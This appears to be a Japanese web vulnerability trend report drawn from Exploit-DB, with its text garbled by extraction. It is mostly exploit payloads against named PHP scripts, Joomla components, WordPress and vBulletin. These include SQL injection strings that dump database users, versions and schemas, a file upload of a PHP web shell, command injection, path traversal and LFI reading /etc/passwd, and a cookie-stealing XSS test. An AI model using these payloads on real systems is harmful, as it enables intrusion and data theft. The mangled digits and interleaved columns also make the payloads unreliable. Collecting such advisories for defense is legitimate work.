KHTML, like Gecko Chrome/6.0.9.75 keywords=' UNION ALL SELECT,,,CONCAT(0x4948544e05454e444e),(/*!08888S elect*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!088 88from*/(information_schema.columns)where@:=export_set( 5,export_set(5,@,/*!08888table_name*/,0xc6c69e,),/*!0 8888column_name*/,0xaa,)),@,)),6,7,8,9,0,,,,4,5,6,7,8,9,0,,-- FS Foodpanda Clone FS Foodpanda Clone.0 07--09 46 SQL Injection 中早急対応要 Advance BB Script.. - 'show_id' / 'pid' /tradeshow-list-detail.php?show_id=- '++UNION+ALL+SELECT+,(/*!Select*/+export_set(5,@:=0,(/*!select*/+count(*)/*!from*/(informatio n_schema.columns)where@:=export_set(5,export_set(5,@,/*! Advance BB Script Advance BB Script.. table_name*/,0xc6c69e,),/*!column_name* /,0xaa,)),@,)),,4,5,6,7,8,9,0,,,,4,5,6,7,8, 9,0,,,,4,5,6,7,8,9,0,,,,4,5,6,7, 8,9,40,4,4,4,44,45,46,47,48,49,50,5,5,5,54,55,56,5 7,58,59,60,6,6,6,64,65,66,67-- 07--09 464 SQL Injection 中早急対応要 Advance Online Learning Management Script. - 'subcatid' / 'popcourseid' /courselist.php?subcatid=- 9'++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4),(5),(6),(7),(8),(9),CONCAT_WS(0x0a0 Advance Online Learning,USER(),DATABASE(),VERSION()),(),(),(),(4),(5),(6), Management Script (7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9)) -- Advance Online Learning Management Script. 07--09 465 SQL Injection 易早急対応要 07--09 466 SQL Injection 中早急対応要 Affiliate MLM Script.0 - 'product-category.php?key' Basic BB Script.0.8 - 'product_details.php?id' /product-category.php?key=a%' AND 546=546 AND '%'=' Affiliate MLM Script Affiliate MLM Script.0 /product_details.php?id=- 48'++/*!7UNION*/+/*!7SELECT*/+,,CONCAT_ WS(0x0a0,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,0 Basic BB Script Basic BB Script.0.8,,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,4--

最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 07--09 467 SQL Injection 中早急対応要 Beauty Parlour Booking Script.0 - 'gender' / 'city' /beautyparloursearch/list?gender='+/*!7union*/+/*!7select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,, Beauty Parlour Booking Script Beauty Parlour Booking Script.0,4,5,6,7,8,9,0,,,CONCAT_WS(0x0a0,USER (),DATABASE(),VERSION()),4,5,6,7,8,9,40,4,4,4,4 4,45,46,47,48,49,50,5,5--+-&main_search= 07-- 480 SQL Injection 中早急対応要 Facebook Clone Script.0 - 'id' / 'send' /friend-profile.php?id=- '++/*!UNION*/(SELECT(),CONCAT_WS(0x0a0,U Facebook Clone Script Facebook Clone Script.0 SER(),DATABASE(),VERSION()))-- 07-- 48 SQL Injection 中早急対応要 Food Order Script.0 - 'list?city' /list?city='++union(select(),(),(),(4),(5),(6),(7),(8),(9),(0 ),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),(),( ),CONCAT_WS(0x0a0,USER(),DATABASE(),VERSION()),( Food Order Script Food Order Script.0 5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),( 8),(9),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5 ),(5))--+-&main_search= 07-- 48 SQL Injection 中早急対応要 Yoga Class Script.0 - 'list?city' /list?city=- '+/*!0UNION*/+/*!0SELECT*/+,,,4,5,6,7,8,9, 0,,,,4,5,6,7,8,9,0,,,,CONCAT_WS(0x Yoga Class Script Yoga Class Script.0 0a0,USER(),DATABASE(),VERSION()),5,6,7,8,9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,50,5,5--+-&main_search= 07-- 48 SQL Injection 中早急対応要 Freelance Website Script.0.6 - 'pr_id' / 'catid' /jobdetails.php?pr_id=- '++UNION(SELECT(),(),(),(4),(5),(/*!08888Select*/+expor t_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(inf ormation_schema.columns)where@:=export_set(5,export_set( 5,@,/*!08888table_name*/,0xc6c69e,),/*!08888column_ name*/,0xaa,)),@,)),(7),(8),(9),(0),(),(),(),(4),(5 ),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8 Freelance Website Script Freelance Website Script.0.6 ),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(40),(4 ),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5),(5),(5),(54 ),(55),(56),(57),(58),(59),(60),(6),(6),(6),(64),(65),(66),(67 ),(68),(69),(70),(7),(7),(7),(74),(75),(76),(77),(78),(79),(80 ),(8),(8),(8),(84),(85),(86),(87),(88),(89),(90),(9),(9),(9 ),(94),(95),(96),(97),(98),(99),(00))--+- 07-- 484 SQL Injection 中早急対応要 Hot Scripts Clone. - 'subctid' / 'mctid' /categories?&mctid=- Yh788'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELEC T(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCH EMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d6 74696f6e5f7668656d6)AND(0x00)IN(@x:=CONCAT(@x,L PAD(@NR:=@NR%b,4,0x0),0xa0,table_name,0xc67 e))))x)-- Hot Scripts Clone Hot Scripts Clone. 07-- 485 SQL Injection 中早急対応要 Foodspotting Clone Script.0 - 'quicksearch.php?q' /quicksearch.php?q=- '++UNION(SELECT(),(/*!08888Select*/+export_set(5,@:=0, (/*!08888select*/+count(*)/*!08888from*/(information_sch ema.columns)where@:=export_set(5,export_set(5,@,/*!0888 Foodspotting Clone Script Foodspotting Clone Script.0 8table_name*/,0xc6c69e,),/*!08888column_name*/,0xa a,)),@,)),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),( 5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),( 8),(9),(0),())-- 07-- 486 SQL Injection 易早急対応要 07-- 487 SQL Injection 中早急対応要 Kickstarter Clone Acript.0 - 'projid' Secure E-commerce Script.0. - 'searchcat' / 'searchmain' /investcalc.php?price=&projid=%0and%0=-- Kickstarter Clone Acript Kickstarter Clone Acript.0 /category.php?searchmain='++/*!50000union*/+/*!50000 SELECT*/+,version(),,4,5,6,7,8,9,0,,,,4,5,6,7, Secure E-commerce Script Secure E-commerce Script.0. 8,9--+- 07-- 488 SQL Injection 中早急対応要 Laundry Booking Script.0 - 'list?city' /laundry-search/list?city=- '+/*!UNION*/+/*!SELECT*/+,,,4,5,6,7,8,9, 0,,,,4,5,6,7,8,9,0,,,,CONCAT_WS(0x Laundry Booking Script Laundry Booking Script.0 0a0,USER(),DATABASE(),VERSION()),5,6,7,8,9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,5 0,5,5,5--+-&main_search= 07-- 489 SQL Injection 中早急対応要 Lawyer Search Script. - 'lawyer-list?city' /lawyer-list?city=- '+/*!UNION*/+/*!SELECT*/+,,,4,5,6,7,8,9, 0,,,,4,5,6,7,8,9,0,,,,CONCAT_WS(0x Lawyer Search Script Lawyer Search Script. 0a0,USER(),DATABASE(),VERSION()),5,6,7,8,9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,5 0,5,5--+-&main_search= 07-- 490 SQL Injection 中早急対応要 Multivendor Penny Auction Clone Script.0 /bidding/detail/- 48++UNION(SELECT(),(),(),(4),(5),(6),(7),CONCAT_WS(0x Multivendor Penny Auction 0a0,USER(),DATABASE(),VERSION()),(9),(0),(),(),( Clone Script ),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6 ),(7),(8),(9))-- Multivendor Penny Auction Clone Script.0 07-- 49 SQL Injection 中早急対応要 Online Exam Test Application Script.6 - 'exams.php?sort' /exams.php?sort=- 4++UNION+ALL+SELECT+,,,(SELECT(@x)FROM(SELECT(@ x:=0x00),(@nr:=0),(select(0)from(information_schem A.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d6746 Online Exam Test Application Script Online Exam Test Application Script.6 96f6e5f7668656d6)AND(0x00)IN(@x:=CONCAT(@x,LPAD (@NR:=@NR%b,4,0x0),0xa0,table_name,0xc67e)) ))x),5,6--+- 07-- 49 SQL Injection 中早急対応要 Opensource Classified Ads Script. POST /advance_result.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 keyword='and (select from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,),floor(rand(0)*))x from information_schema.tables group by x)a) AND ''=' Opensource Classified Ads Script Opensource Classified Ads Script. 07-- 49 SQL Injection 中早急対応要 PHP Multivendor Ecommerce.0 - 'sid' / 'searchcat' / 'chid' /single_detail.php?sid= AND 4059=4059 PHP Multivendor Ecommerce PHP Multivendor Ecommerce.0 07-- 494 SQL Injection 中早急対応要 Professional Service Script.0 - 'service-list?city' 07-- 495 SQL Injection 中早急対応要 Readymade PHP Classified Script. - 'subctid' / 'mctid' /servicelist?city='+/*!7union*/+/*!7select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,concat_ Professional Service Script Professional Service Script.0 WS(0x0a0,USER(),DATABASE(),VERSION()),5,6,7,8, 9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,4 8,49,50,5,5--+-&main_search= /categories?&mctid=- Yh788'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELEC T(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCH EMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d6 74696f6e5f7668656d6)AND(0x00)IN(@x:=CONCAT(@x,L PAD(@NR:=@NR%b,4,0x0),0xa0,table_name,0xc67 e))))x)-- Readymade PHP Classified Script Readymade PHP Classified Script. 07-- 496 SQL Injection 中早急対応要 Readymade Video Sharing Script. /single-video-detail.php?video_id=mtmy&report_videos[]=' AND ELT(7764=7764,974) AND 'BZFh'='BZFh&report_submit= Readymade Video Sharing Script Readymade Video Sharing Script. 07-- 497 SQL Injection 易早急対応要 Responsive Realestate Script. - 'property-list?tbud' /property-list?tbud=500-0000 AND 479=479&quicksrch= Responsive Realestate Script Responsive Realestate Script.

最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 07-- 499 SQL Injection 中早急対応要 Multireligion Responsive Matrimonial 4.7. - 'succid' /success-story.php?succid=- 6++/*!0UNION*/(/*!0SELECT*/+0x89,0x8 9,0x89,0x849,0x859,0x869,0x879,0 x889,(/*!0select*/+export_set(5,@:=0,(/*!0sel ect*/+count(*)/*!0from*/(information_schema.columns) Multireligion Responsive Matrimonial Multireligion Responsive Matrimonial 4.7. where@:=export_set(5,export_set(5,@,/*!0table_name* /,0xc6c69e,),/*!0column_name*/,0xaa,)),@,)),0x 809,0x89,0x89,0x89,0x84 9,0x859,0x869,0x879,0x889,0x 899)-- 07-- 400 SQL Injection 中早急対応要 Responsive Events & Movie Ticket Booking Script.. - 'findcity.php?q' /findcity.php?q=s'+/*!0union*/+/*!0select*/+0x,0x,0x,(/*!0select*/+export_set(5,@:=0,(/*!0 select*/+count(*)/*!0from*/(information_schema.colu Responsive Events & Movie mns)where@:=export_set(5,export_set(5,@,/*!0table_na Ticket Booking Script me*/,0xc6c69e,),/*!0column_name*/,0xaa,)),@, )),0x5,0x6,0x7,0x8,0x9,0x0,0x,0x,0x,0x4,0x5,0x6,0x7,0x8,0x9,0x0-- Responsive Events & Movie Ticket Booking Script.. 07-- 40 SQL Injection 中早急対応要 Multiplex Movie Theater Booking Script..5 - 'moid' / 'eid' /show-time.php?moid=- 0'++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)F ROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NA Multiplex Movie ME=0x746966b65745f6646d696e)AND(0x00)IN(@x:=con Theater Booking Script cat(@x,concat(lpad(@nr:=@nr+,,0x0),0xa0,column _name,0xc67e)))))x),(),(4),(5),(6),(7),(8),(9),( 0),(),(),())-- Multiplex Movie Theater Booking Script..5 07-- 40 SQL Injection 中早急対応要 Single Theater Booking Script.. - 'findcity.php?q' 07-- 404 SQL Injection 中早急対応要 Advanced Real Estate Script 4.0.7 /findcity.php?q=s'++/*!0union*/+/*!0select*/+,,,(/*!0select*/+export_set(5,@:=0,(/*!0select* /+count(*)/*!0from*/(information_schema.columns)wh ere@:=export_set(5,export_set(5,@,/*!0table_name*/,0x c6c69e,),/*!0column_name*/,0xaa,)),@,)),5--+- Single Theater Booking Script Single Theater Booking Script.. /search-results.php?projectmain=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4),(5),(6),(/*!0Select*/+export_set(5,@:=0, (/*!0select*/+count(*)/*!0from*/(information_sch ema.columns)where@:=export_set(5,export_set(5,@,/*!0 table_name*/,0xc6c69e,),/*!0column_name*/,0xa a,)),@,)),(8),(9),(0),(),(),(),(4),(5),(6),(7),( 8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(40),(4 ),(4),(4),(44),(45),(46),(47),(48),(49))--+-&search= Advanced Real Estate Script Advanced Real Estate Script 4.0.7 07-- 405 SQL Injection 中早急対応要 Entrepreneur Bus Booking Script.0.4 - 'sourcebus' /booker_details.php?sourcebus=- ++/*!09999UNION*/+/*!09999SELECT*/+(/*!09999Select* /+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999fro Entrepreneur Bus Booking Script Entrepreneur Bus Booking Script.0.4 m*/(information_schema.columns)where@:=export_set(5,exp ort_set(5,@,/*!09999table_name*/,0xc6c69e,),/*!09999c olumn_name*/,0xaa,)),@,))--+- 07-- 406 SQL Injection 中早急対応要 MLM Forex Market Plan Script.0.4 - 'newid' / 'eventid' /news_detail.php?newid=- 7'++/*!06666UNION*/(/*!06666SELECT*/+0x89,0x494 8544e05454e444e,(/*!06666Select*/+export_set(5, @:=0,(/*!06666select*/+count(*)/*!06666from*/(informatio MLM Forex Market Plan Script MLM Forex Market Plan Script.0.4 n_schema.columns)where@:=export_set(5,export_set(5,@,/*! 06666table_name*/,0xc6c69e,),/*!06666column_name* /,0xaa,)),@,)),0x849,0x859,0x869)--+- 07-- 407 SQL Injection 中早急対応要 MLM Forced Matrix.0.9 - 'newid' /news-detail.php?newid=- 7'++/*!00008UNION*/(/*!00008SELECT*/+0x89,0x494 8544e05454e444e,(/*!00008Select*/+export_set(5, @:=0,(/*!00008select*/+count(*)/*!00008from*/(informatio MLM Forced Matrix MLM Forced Matrix.0.9 n_schema.columns)where@:=export_set(5,export_set(5,@,/*! 00008table_name*/,0xc6c69e,),/*!00008column_name* /,0xaa,)),@,)),0x849,0x859,0x869)--+- 07-- 408 SQL Injection 中早急対応要 Car Rental Script.0.4 - 'val' /countrycode.php?val=- '++/*!07777UNION*/+/*!07777SELECT*/+@@version--+- Car Rental Script Car Rental Script.0.4 07-- 409 SQL Injection 中早急対応要 Groupon Clone Script.0 - 'state_id' / 'search' /city_ajax.php?state_id=- '++/*!09999UNION*/+/*!09999SELECT*/+0x,(/*!09999 Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09 Groupon Clone Script Groupon Clone Script.0 999from*/(information_schema.columns)where@:=export_set (5,export_set(5,@,/*!09999table_name*/,0xc6c69e,),/*!0 9999column_name*/,0xaa,)),@,))--+- 07-- 40 SQL Injection 中早急対応要 Muslim Matrimonial Script.0 - 'succid' /success-story.php?succid=- ++/*!04444UNION*/+/*!04444SELECT*/+0x,0x,0x,0x4,0x5,0x6,0x7,0x8,0x9,(SELECT(@x)FROM(SELECT( @x:=0x00),(@nr:=0),(select(0)from(information_sche MA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d67 4696f6e5f7668656d6)AND(0x00)IN(@x:=CONCAT(@x,LP AD(@NR:=@NR+,4,0x0),0xa0,table_name,0xc67e)) ))x),0x,0x,0x,0x4,0x5,0x6,0x7, 0x8,0x9--+- Muslim Matrimonial Script Muslim Matrimonial Script.0 07-- 4 SQL Injection 易早急対応要 Advanced World Database.0.5 /state.php?country=russian Federation' AND 69=69 AND 'kvcm'='kvcm&state=moskva Advanced World Database Advanced World Database.0.5 07-- 4 SQL Injection 中早急対応要 Resume Clone Script.0.5 /preview.php?id=- ++/*!08888UNION*/(/*!08888SELECT*/+0x89,0x8 9,0x89,0x849,0x859,0x869,0x879,0x Resume Clone Script Resume Clone Script.0.5 889,0x899,CONCAT_WS(0x0a0,USER(),DATABAS E(),VERSION()),0x89,0x89,0x89,0x8 49)--+- 07-- 44 SQL Injection 中早急対応要 Basic Job Site Script.0.5 POST /onlinejobsearch/job HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 keyword='and (select from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,),floor(rand(0)*))x from information_schema.tables group by x)a) AND ''=' Basic Job Site Script Basic Job Site Script.0.5 07-- 46 SQL Injection 中早急対応要 Vanguard.4 /p/'++/*!50000union*/+/*!50000select*/+%c(/*!0888 8Select*/+export_set(5%c@:=0%c(/*!08888select*/+coun t(*)/*!08888from*/(information_schema.columns)where@:=e xport_set(5%cexport_set(5%c@%c/*!08888table_name* /%c0xc6c69e%c)%c/*!08888column_name*/%c0x Vanguard Vanguard.4 aa%c))%c@%c))%c%c4%c5%c6%c7%c8 %c9%c0%c%c%c%c4%c5%c6%c 7%c8%c9%c0%c%c%c%c4%c5 %c6%c7%c8%c9%c0%c%c%c--+- 07-- 4 SQL Injection 中早急対応要 Joomla! Component JBuildozer.4. - 'appid' /index.php?option=com_jbuildozer&view=entriessearch&tmpl =component&mode=module&tpl=&appid=%0%0%f*!05555procedure*%f%0%f*!05555analyse*%f%0% 8extractvalue(0%c%f*!05555concat*%f%80x7,0x4 968766e05656e666e,0xa,@@version%9%9,0% 9%d%d%0%d Joomla! Component Jbuildozer Joomla! Component JBuildozer.4.

最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 07-- 44 File Upload 易早急対応要 Accesspress Anonymous Post Pro <..0 - Unauthenticated Arbitrary File Upload 脆弱性 POST /wp-admin/adminajax.php?action=ap_file_upload_action&file_uploader_nonce =[nonce]&allowedextensions[]=php&sizelimit=64000 HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 -----------------------------705966098045779 Content-Disposition: form-data; name="qqfile"; filename="myshell.php" Content-Type: text/php <?php echo shell_exec($_get['e'].' >&');?> -----------------------------705966098045779-- Accesspress Anonymous Post Pro Accesspress Anonymous Post Pro <..0 07-- 49 SQL Injection 中早急対応要 Question And Answer..0 /index.php/en/component/jequestions/?view=tags&an=%d VerAyari'%0%f*!06666UNION*%f%0%f*!06666SEL ECT*/%0%c(SELECT%0GROUP_CONCAT(table_name %0SEPARATOR%00xc67e)%0FROM%0INFORMA TION_SCHEMA.TABLES%0WHERE%0TABLE_SCHEMA=DA Question And Answer TABASE())%c%c4%c5%c6%c7%c8%c9%c0% c%c%c%c4%c5%c6%c7%c8%c 9%c0%c%c%c%c4%c5%d%d%0% d Question And Answer..0 07-- 40 SQL Injection 中早急対応要 Video Gallery.0.5 - 'id' /index.php?option=com_jevideogallery&view=category&id=99 %0AND(SELECT%0%0FROM%0(SELECT%0COUNT( *),CONCAT((SELECT(SELECT%0CONCAT(CAST(DATABASE() %0AS%0CHAR)%c0x7e,0x4968766e5656e666e)) %0FROM%0INFORMATION_SCHEMA.TABLES%0WHERE Video Gallery %0table_schema=DATABASE()%0LIMIT%00,),FLOOR(R AND(0)*))x%0FROM%0INFORMATION_SCHEMA.TABLES %0GROUP%0BY%0x)a) Video Gallery.0.5 07-- 46 Directory Traversal 難早急対応要 vbulletin 5 - 'routestring' Unauthenticated Remote Code Execution 脆弱性 /index.php?routestring=\\..\\..\\..\\..\\..\\..\\.. \\..\\..\\..\\xampp\\apache\\logs\\access.log vbulletin vbulletin 5 07-- 46 Command Injection 難早急対応要 vbulletin 5 - 'cachetemplates' Unauthenticated Remote Arbitrary File Deletion 脆弱性 POST /vb5/ajax/api/template/cachetemplates HTTP/. Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 0 0) AppleWebKit/57.6 (KHTML, like Gecko) Chrome/6.0.6.00 Safari/57.6 Upgrade-Insecure-Requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/ webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: it-it,it;q=0.8,en-us;q=0.6,en;q=0.4 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 5 templates[]=&templateidlist=o:0:"vb_image_imagemagick" ::{s:0:"%00*%00imagefilelocation";s::"/etc/passwd";} vbulletin vbulletin 5 07--4 4 XSS 易高 Readymade Video Sharing Script. - HTML Injection 脆弱性 /single-videodetail.php?video_id=mtmy&comment=<script>alert(documen Readymade Video Sharing Script Readymade Video Sharing Script. t.cookie);</script>&comment_submit= 07--4 44 SQL Injection 中早急対応要 Paid To Read Script.0.5 - 'uid' / 'fnum' / 'fn' /admin/userview.php?uid=- 9++/*!08888UNION*/(/*!08888SELECT*/()%c()%c() %c(4)%c(5)%c(6)%c(7)%c(8)%c(9)%c(0)%c( )%c()%c()%c(4)%c(5)%c(6)%c(7)%c(8) %c(9)%c(0)%c()%c()%c()%c(4)%c(5) %c(6)%c(7)%c(8)%c(9)%c(0)%c()%c() %c()%c(4)%c(5)%c(6)%c(7)%c(8)%c(9) %c(40)%c(4)%c(4)%c(4)%c(44)%c(45)%c(46) Paid To Read Script Paid To Read Script.0.5 %c(47)%c(48)%c(/*!08888select*/+export_set(5%c@: =0%c(/*!08888select*/+count(*)/*!08888from*/(informati on_schema.columns)where@:=export_set(5%cexport_set(5 %c@%c/*!08888table_name*/%c0xc6c69e%c)% c/*!08888column_name*/%c0xaa%c))%c@%c))% c(50)%c(5)%c(5)%c(5)%c(54)%c(55)%c(56)% c(57)%c(58)%c(59)%c(60)%c(6)%c(6)%c(6)% c(64)%c(65)%c(66)%c(67)%c(68))--+- 07--4 45 SQL Injection 中早急対応要 FS Lynda Clone.0 POST /tutorial/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 keywords=' and(select FROM(select count(*),concat((select (select concat(database(),0x7,0x7e,0x4948544e05454e444 e)) FROM information_schema.tables LIMIT 0,),floor(rand(0)*))x FROM information_schema.tables GROUP BY x)a)-- - FS Lynda Clone FS Lynda Clone.0 07--4 46 SQL Injection 中早急対応要 Bus Booking Script.0 - 'txtname' POST /newbusbooking/admin/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 txtname=' UNION ALL SELECT 0x,0x5645504594549,0x,0x4,0x5-- Bus Booking Script Bus Booking Script.0 07--4 47 SQL Injection 易早急対応要 Piwigo.9. - 'cat_true' / 'cat_false' POST /admin.php?page=cat_options&section=status HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 Piwigo Piwigo.9. cat_false%5b%5d=%0and%0=--&trueify=%c%ab 07--4 46 Command Injection 難早急対応要 Linksys WVBR0 - 'User-Agent' Remote Command Injection 脆弱性 GET / HTTP/. User-Agent: "; ls -al "admin Linksys WVBR0 Linksys WVBR0 07--5 44 Command Injection 難早急対応要 ITGuard-Manager 0.0.0. - Remote Code Execution 脆弱性 POST /cgi-bin/drknow.cgi?req=login HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 req=login&lang=kor&username= admin 'ls - al' x&password=admin ITGuard-Manager ITGuard-Manager 0.0.0.

最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 07--5 446 SQL Injection 中早急対応要 Movie Guide.0 /index.php?md=%dv'%0%0%f*!0union*%f( %f*!0select*%f%00x58559%c 0x58559%c(%f*!0Select*%f%0 export_set(5%c@:=0%c(%f*!0select*%f%0coun t(*)%f*!0from*%f(information_schema.columns%9 where@:=export_set(5%cexport_set(5%c@%c%f*!0 table_name*%f%c0xc6c69e%c)%c%f*!0 Movie Guide Movie Guide.0 column_name*%f%c0xaa%c))%c@%c))%c0x5 85459%c0x585559%c0x5 85659%c0x585759%c0x5 85859%c0x585959%c0x5 855059%c0x5855 59%c0x585559)%d%d%0 %d 07--8 449 SQL Injection 中早急対応要 Cells Blog.5 - 'bgid' / 'fmid' / 'fnid' /pub_post.php?bgid=45&fmid=- 7+UNION%0SELECT+0x5%c0x5%c0x5 %c0x54%c0x55%c0x56%c0x57 %c0x58%c%9%c0x550%c0x5 Cells Blog Cells Blog.5 5%c0x55%c0x55%c0x 554%c0x555%c0x556 %c0x557%c0x558%c0x5 59%d%d%0%d 07--8 450 SQL Injection 中早急対応要 Joomla! Component JB Visa.0 - 'visatype' /index.php?option=com_bookpro&view=popup&visatype=5 9999%0AND(SELECT%0%0FROM%0(SELECT%0CO UNT(*)%cCONCAT((SELECT(SELECT%0CONCAT(CAST(DA TABASE()%0AS%0CHAR)%c0x7e%c0x4968766e5 Joomla! Component JB Visa Joomla! Component JB Visa.0 656e666e))%0FROM%0INFORMATION_SCHEMA.TABL ES%0WHERE%0table_schema=DATABASE()%0LIMIT% 00%c)%cFLOOR(RAND(0)*))x%0FROM%0INFORMA TION_SCHEMA.TABLES%0GROUP%0BY%0x)a) 07--8 45 SQL Injection 中早急対応要 Joomla! Component Guru Pro - 'promocode' /gurubuy?promocode='%0/*!50000procedure*/%0/*!50 000Analyse*/%0(extractvalue(0%c/*!50000concat*/(0x7 Joomla! Component Guru Pro %c0x4968766e05656e666e%c0xa%c@@versio n))%c0)%d%d%00xd Joomla! Component Guru Pro 07--8 457 SQL Injection 中早急対応要 Joomla! Component User Bench.0 - 'userid' /index.php?option=com_userbench&view=detail&userid=% 0AND(SELECT%0%0FROM%0(SELECT%0COUNT(*)% cconcat((select(select%0concat(cast(database() %0AS%0CHAR)%c0x7e%c0x4968766e5656e66 Joomla! Component User Bench Joomla! Component User Bench.0 6e))%0FROM%0INFORMATION_SCHEMA.TABLES%0WH ERE%0table_schema=DATABASE()%0LIMIT%00%c)% cfloor(rand(0)*))x%0from%0information_sche MA.TABLES%0GROUP%0BY%0x)a) 07--8 458 SQL Injection 中早急対応要 Joomla! Component My Projects.0 /component/myproject/verayari'and%0(select%0%0fro m%0(select%0count(*)%cconcat((select(select%0conca t(cast(database()%0as%0char)%c0x7e))%0from%0inf ormation_schema.tables%0where%0table_schema=datab ase()%0limit%00%c)%cfloor(rand(0)*))x%0from% 0information_schema.tables%0group%0by%0x)a)%0 AND%0''=' Joomla! Component My Projects Joomla! Component My Projects.0 07--9 465 SQL Injection 中早急対応要 Joomla! Component NextGen Editor..0 - 'plname' /index.php?option=com_nge&view=config&plname='and% 0(select%0%0from%0(select%0count(*)%cconcat((s elect(select%0concat(cast(database()%0as%0char)%c0 Joomla! Component x7e))%0from%0information_schema.tables%0where% NextGen Editor 0table_schema=database()%0limit%00%c)%cfloor(ra nd(0)*))x%0from%0information_schema.tables%0grou p%0by%0x)a)%0and%0''=' Joomla! Component NextGen Editor..0 07--9 479 SQL Injection 中早急対応要 BEIMS ContractorWeb 5.8.0.0 POST /CWEBNET/WOSummary/List HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 tradestatus=%0and%0=-- BEIMS ContractorWeb BEIMS ContractorWeb 5.8.0.0 07--6 49 SQL Injection 中早急対応要 FAQ Pro 4.0.0 - 'id' /index.php?option=com_jefaqpro&view=category&id=+or ++GROUP+BY+CONCAT_WS(0xa,0x4968766e5656e6 66e,VERSION(),FLOOR(RAND(0)*))+HAVING+MIN(0)+OR FAQ Pro +&Itemid=494 FAQ Pro 4.0.0 07--6 49 LFI 易中 Biometric Shift Employee Management System.0 - Local File Disclosure 脆弱性 /index.php?user=download?name=verayari.ver&path=../../../../../etc/passwd%00 Biometric Shift Employee Management System Biometric Shift Employee Management System.0 07--6 495 SQL Injection 中早急対応要 Sendroid < 6.5.0 /API/index.php?action=compose&username=asdasd%7)% 0OR%0(SELECT%0%0FROM(SELECT%0COUNT(*),CONCAT((<query>),FLOOR(RAND(0)*))x%0FROM%0/*!I Sendroid Sendroid < 6.5.0 - NFORMATION_SCHEMA*/.PLUGINS%0GROUP%0BY%0x )a)--&api_key=sdsd&sender 07--6 496 Command Injection 難早急対応要 07--7 498 Directory Traversal 易中 07--7 499 XSS 易高 SilverStripe CMS.6. - CSV Excel Macro Injection 脆弱性 Xerox DC60 EFI Fiery Controller Webtools.0 - Arbitrary File Disclosure 脆弱性 Easy!Appointments.. - Cross-Site Scripting 脆弱性 POST /SilverStripe/admin/myprofile/EditForm/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 